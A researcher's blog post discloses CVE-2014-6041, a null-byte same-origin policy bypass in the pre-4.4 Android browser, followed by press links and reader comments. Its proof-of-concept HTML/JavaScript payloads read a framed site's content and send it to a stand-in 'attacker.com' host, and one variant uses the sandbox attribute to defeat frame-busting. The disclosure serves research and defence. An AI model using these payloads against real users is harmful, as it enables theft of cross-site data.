Android Browser Same Origin Policy Bypass < 4.4 - CVE-2014-6041

Introduction

Same Origin Policy (SOP) is one of the most important security mechanisms that are applied in modern browsers, the basic idea behind the SOP is the javaScript from one origin should not be able to access the properties of a website on another origin. The origin is formed by the combination of Scheme, domain and port with the port being an exception to IE. There are some exceptions with SOP such the location property, objects wtih src attribute. However, the fundamental are that different origins should not be able to access the properties of one another.

SOP Bypass

A SOP bypass occurs when a sitea.com is some how able to access the properties of siteb.com such as cookies, location, response etc. Due to the nature of the issue and potential impact, browsers have very strict model pertaining it and a SOP bypass is rarely found in modern browsers. However, they are found once in a while. The following writeup describes a SOP bypass vulnerability i found in my Qmobile Noir A20 running Android Browser 4.2.1, and later verified that Sony+Xperia+Tipo, Samsung galaxy, HTC Wildfire, Motrorolla etc are also affected. To best of my knowledge, the issue occurred due to improper handling of nullbytes by url parser.

Update: Other folks have verified this issue to work under Android browser < 4.4. Ref - https://github.com/rapid7/metasploit-framework/pull/3759

The following is a proof of concept:

Proof Of Concept 

<iframe name="test" src="http://www.rhainfosec.com"></iframe>
<input type=button value="test"
onclick="window.open('\u0000javascript:alert(document.domain)','test')" >

As you can see that the code tries accessing the document.domain property of a site loaded into an iframe. If you run the POC at attacker.com on any of the modern browsers, it would return a similar error as attacker.com should not be able to access the document.domain property of rhainfosec.com.

Blocked a frame with origin "http://jsbin.com" from accessing a frame with origin "http://www.rhainfosec.com". Protocols, domains, and ports must match.

However, running it on any of the vulnerable smart phones default browsers would alert the document.domain property indicating that the SOP was not able to restrict the access to document.domain property of a site at a different origin.

I created the following POC, so you can mess around with some stuff:

Reading the response

You can read the response of any page by accessing the document.body.innerHTML property.

<iframe name="test" src="http://www.rhainfosec.com"></iframe>
<input type=button value="test"
onclick="window.open('\u0000javascript:alert(document.body.innerHTML)','test')" >

Reading the response and sending it to an attackers domain

In real world situation an attacker would send the response to his controlled domain. 

<iframe name="test" src="http://www.rhainfosec.com"></iframe>
<input type=button value="test"
onclick="window.open('\u0000javascript:var i=new Image();i.src='//attacker.com?'+document.body.innerHTML;document.body.appendChild(i);','test')" >

Bypassing Frame Busting Code

A lot of websites still use frame busting code to prevent the page from being prevent and since we can only bypass SOP here when the site could be framed. In case, where the site is using a frame busting code, we can bypass it using the sandbox attribute that was introduced as a part of HTML5 specifications.

<iframe name="test" src="http://www.rhainfosec.com" sandbox></iframe>
<input type=button value="test"
onclick="window.open('\u0000javascript:var i=new Image();i.src='//attacker.com?'+document.body.innerHTML;document.body.appendChild(i);','test')" >

Update: A metasploit module has been released by jvennix-r7 which also supports x-frame-options bypass making it a completely universal exploit.  Ref - https://github.com/rapid7/metasploit-framework/pull/3759

Affected Versions

The initial tests were carried out on android browser 4.2.1 (Qmobile) and below and later verified with Galaxy S3, HTC wildfire, Sony Xperia, Qmobile etc.

The following are some of the smartphones i tested with browserstack.com.

Samsung Galaxy S3


Motrorolla Razr




Sony Xperia Tipo



HTC Evo 3D and Wildfire 


Hope you enjoyed it, Until next time. Pass the comments.

Updates

Press Coverage

http://threatpost.com/flaw-in-android-browser-allows-same-origina-policy-bypass/108265#comment-317786

https://showyou.com/v/y-yY23sS6DoEs/android-browser-vulnerability-security-now-473

 https://securitystreet.jive-mobile.com/#jive-document?content=%2Fapi%2Fcore%2Fv2%2Fposts%2F6804

 http://www.theregister.co.uk/2014/09/16/three_quarters_of_droid_phones_open_to_web_page_spy_bug/

http://linustechtips.com/main/topic/216087-metasploit-major-android-bug-is-a-privacy-disaster-cve-2014-6041/

http://nakedsecurity.sophos.com/2014/09/16/shocking-android-browser-bug-could-be-a-privacy-disaster-heres-how-to-fix-it/

http://www.forbes.com/sites/thomasbrewster/2014/09/16/widespread-android-vulnerability-a-privacy-disaster-claim-researchers/

http://www.securityweek.com/dangerous-same-origin-policy-bypass-flaw-found-android-browser

http://www.computerworld.com/article/2684059/many-android-devices-vulnerable-to-session-hijacking-through-the-default-browser.html

http://gadgets.ndtv.com/mobiles/news/android-browser-security-hole-affects-millions-of-users-says-expert-592578

http://www.bostonglobe.com/business/2014/09/15/rapid-boston-finds-android-flaw/JJ9iHJB6YTcs10a7O9TjpN/story.html

http://www.digit.in/mobile-phones/android-security-flaw-affects-millions-of-users-23921.html

http://www.phonearena.com/news/New-Android-bug-called-a-privacy-disaster_id60750

http://www.scmagazine.com/android-bug-allowing-sop-bypass-a-privacy-disaster-researcher-warns/article/371917/

http://arstechnica.com/security/2014/09/android-browser-flaw-a-privacy-disaster-for-half-of-android-users/

http://thehackernews.com/2014/09/new-android-browser-vulnerability-is.html

http://xakep.ru/news/aosp-browser-sop/

http://blog.trendmicro.com/trendlabs-security-intelligence/same-origin-policy-bypass-vulnerability-has-wider-reach-than-thought/

http://daily.urdupoint.com/livenews/2014-09-17/news-303641.html

http://dailypakistan.com.pk/daily-bites/17-Sep-2014/144263

http://e.jang.com.pk/09-24-2014/karachi/page16.asp

http://tribune.com.pk/story/764713/online-security-pakistani-helps-google-avoid-privacy-disaster/

http://www.dawn.com/news/1133178/pakistani-researcher-reveals-privacy-flaw-in-android-browsers

http://tribune.com.pk/story/764925/credit-to-our-white-hats/

http://propakistani.pk/2014/09/23/pakistani-researcher-helps-google-preventing-massive-security-disaster/

http://www.makeuseof.com/tag/this-android-browser-bug-will-make-you-upgrade-to-kitkat/

18 comments:

  1. Wow, Excellent post. This article is really very interesting and enjoyable. I think its must be helpful for us. Thanks for sharing your nice post.
    telepathy show

    ReplyDelete
  2. what's the purpose of that null character?
    Thanks!

    ReplyDelete
  3. In generic terms it is referred as an end of a string (C world), it is also referred as an escape sequence.

    ReplyDelete
  4. yes i know that.....but why does it work here? What's the logic....this is what i don't understand.....Thanks!

    ReplyDelete
  5. Its because when the parser encounters the null bytes, it thinks that the string has been terminated, however it hasn't been, which in my opinion leads the rest of the statement being executed.

    ReplyDelete
  6. // Get rid of leading whitespace and control characters.
    I find this in source code
    http://androidxref.com/4.2_r1/xref/external/webkit/Source/WebCore/platform/KURL.cpp

    ReplyDelete
  7. Thanks for forcing Google's hand,for that's what transpired. "can't reproduce" my rear end! Amazingly,they can! LOL

    ReplyDelete
  8. Your background. Hurts. My brain.

    ReplyDelete
  9. I'm happy that my Pakistani friend has found this vulnerability and feeling proud, you've done it bro. I'm happy that such a intelligent guy is in my FB friends. :)

    ReplyDelete
  10. Rafy Baloch we are proud of you. May Allah give you more and more success in future!

    -Muhammad Usman Ghani

    ReplyDelete
  11. We are proud of you Rafay.

    Keep it up bro!

    :-)

    ReplyDelete
  12. Hi,

    I made a simple website where you can test your AOSP browser for this vulnerability. Check http://www.androidleak.tk

    ReplyDelete
  13. very well done Rafay Baloch.
    www.urdujazeera.com

    ReplyDelete
  14. Have you test it on more webkit based browsers ? (safari)

    ReplyDelete
  15. Great Post Thanks For Sharing :)

    Regards:
    Syed Bahadur Shah
    Buy Facebook Likes

    ReplyDelete
  16. nice pot i like it thanks for sharing

    ReplyDelete
  17. this is really great and helpful article for me thanks

    ReplyDelete

 
Rafay Baloch is an Independent security researcher, Internet marketer, Entrepreneur and a SEO consultant, He is the founder of RHA blog and multiple other blogs. Rafay got famous after finding a Remote Code Execution bug inside PayPal for which PayPal awarded him a sum of 10,000$ Read More..

Join In!

RHA © 2013. All Rights Reserved.